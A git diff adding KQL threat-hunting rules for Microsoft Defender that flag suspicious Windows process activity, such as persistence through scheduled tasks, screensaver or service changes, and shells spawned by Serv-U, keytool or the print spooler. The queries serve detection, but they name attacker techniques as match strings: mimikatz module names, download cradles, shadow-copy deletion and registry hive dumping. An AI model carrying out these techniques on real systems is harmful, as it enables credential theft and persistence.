+// False Positives:
+//   - Legitimate processes that run at logon. Filter according to your environment
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql
new file mode 100644
index 00000000..7cd415cb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious ScreenSave Change by Reg.exe
+// Author: frack113
+// Date: 2021-08-19
+// Level: medium
+// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
+// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002
+// False Positives:
+//   - GPO
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains ".scr" and ProcessCommandLine contains "/f"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql b/KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql
new file mode 100644
index 00000000..afe5bb3a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Script Execution From Temp Folder
+// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
+// Date: 2021-07-14
+// Level: high
+// Description: Detects a suspicious script executions from temporary folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Administrative scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql b/KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql
new file mode 100644
index 00000000..b074209f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Serv-U Process Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-14
+// Level: high
+// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555, cve.2021-35211
+// False Positives:
+//   - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql b/KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql
new file mode 100644
index 00000000..57d3591f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Service Binary Directory
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-09
+// Level: high
+// Description: Detects a service binary running in a suspicious directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql b/KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql
new file mode 100644
index 00000000..3631267b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Service DACL Modification Via Set-Service Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_service_path_modification.kql b/KQL/rules/windows/process_creation/suspicious_service_path_modification.kql
new file mode 100644
index 00000000..845ab73d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_service_path_modification.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Service Path Modification
+// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-21
+// Level: high
+// Description: Detects service path modification via the "sc" binary to a suspicious command or path
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql
new file mode 100644
index 00000000..bfff2e09
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious ShellExec_RunDLL Call Via Ordinal
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-12-01
+// Level: high
+// Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands.
+// Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "SHELL32.DLL" and (InitiatingProcessCommandLine contains "#568" or InitiatingProcessCommandLine contains "#570" or InitiatingProcessCommandLine contains "#572" or InitiatingProcessCommandLine contains "#576")) and ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "comspec" or InitiatingProcessCommandLine contains "iex" or InitiatingProcessCommandLine contains "Invoke-" or InitiatingProcessCommandLine contains "msiexec" or InitiatingProcessCommandLine contains "odbcconf" or InitiatingProcessCommandLine contains "regsvr32") or (InitiatingProcessCommandLine contains "\\Desktop\\" or InitiatingProcessCommandLine contains "\\ProgramData\\" or InitiatingProcessCommandLine contains "\\Temp\\" or InitiatingProcessCommandLine contains "\\Users\\Public\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql b/KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql
new file mode 100644
index 00000000..436716d6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Shells Spawn by Java Utility Keytool
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-12-22
+// Level: high
+// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql
new file mode 100644
index 00000000..1c1335e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Speech Runtime Binary Child Process
+// Author: andrewdanis
+// Date: 2025-10-23
+// Level: high
+// Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.
+// Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218
+// False Positives:
+//   - Unlikely.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\SpeechRuntime.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql b/KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql
new file mode 100644
index 00000000..a22c6dfa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Splwow64 Without Params
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects suspicious Splwow64.exe process without any command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql b/KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql
new file mode 100644
index 00000000..1ab26495
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Spool Service Child Process
+// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
+// Date: 2021-07-11
+// Level: high
+// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.privilege-escalation, attack.t1068
+
+DeviceProcessEvents
+| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql b/KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql
new file mode 100644
index 00000000..f3b5f281
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious SysAidServer Child
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-26
+// Level: medium
+// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1210
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql
new file mode 100644
index 00000000..706dd2f1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious SYSTEM User Process Creation
+// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
+// Date: 2021-12-20
+// Level: high
+// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.privilege-escalation, attack.t1134, attack.t1003, attack.t1027
+// False Positives:
+//   - Administrative activity
+//   - Scripts and administrative tools used in the monitored environment
+//   - Monitoring activity
+
+DeviceProcessEvents
+| where (((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\wscript.exe") or ProcessCommandLine matches regex "net\\s+user\\s+" or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump"))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "127.0.0.1" and ProcessCommandLine contains " -n ") or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql b/KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql
new file mode 100644
index 00000000..8b6a6c94
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious SYSVOL Domain Group Policy Access
+// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-04-09
+// Level: medium
+// Description: Detects Access to Domain Group Policies stored in SYSVOL
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql b/KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql
new file mode 100644
index 00000000..ad3db279
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious TSCON Start as SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-17
+// Level: high
+// Description: Detects a tscon.exe start as LOCAL SYSTEM
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\tscon.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql b/KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql
new file mode 100644
index 00000000..fc056b7f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious UltraVNC Execution
+// Author: Bhabesh Raj
+// Date: 2022-03-04
+// Level: high
+// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.g0047, attack.t1021.005
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
new file mode 100644
index 00000000..2e9d881e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Uninstall of Windows Defender Feature via PowerShell
+// Author: yxinmiracle
+// Date: 2025-08-22
+// Level: high
+// Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Windows-Defender" and (ProcessCommandLine contains "Uninstall-WindowsFeature" or ProcessCommandLine contains "Remove-WindowsFeature") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
new file mode 100644
index 00000000..d5947d9a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+//   - Legitimate usage to restore snapshots
+//   - Legitimate admin activity
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql
new file mode 100644
index 00000000..29fd1b73
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Usage of For Loop with Recursive Directory Search in CMD
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2025-11-12
+// Level: medium
+// Description: Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.
+// This pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.
+// This behavior has been observed in various malicious lnk files.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1027.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "for /f" and ProcessCommandLine contains "tokens=" and ProcessCommandLine contains "in (" and ProcessCommandLine contains "dir") or (InitiatingProcessCommandLine contains "for /f" and InitiatingProcessCommandLine contains "tokens=" and InitiatingProcessCommandLine contains "in (" and InitiatingProcessCommandLine contains "dir")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql
new file mode 100644
index 00000000..e2315f37
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Usage Of ShellExec_RunDLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "comspec" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "regsvr32")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql b/KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql
new file mode 100644
index 00000000..462ed156
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Use of CSharp Interactive Console
+// Author: Michael R. (@nahamike01)
+// Date: 2020-03-08
+// Level: high
+// Description: Detects the execution of CSharp interactive console by PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1127
+// False Positives:
+//   - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
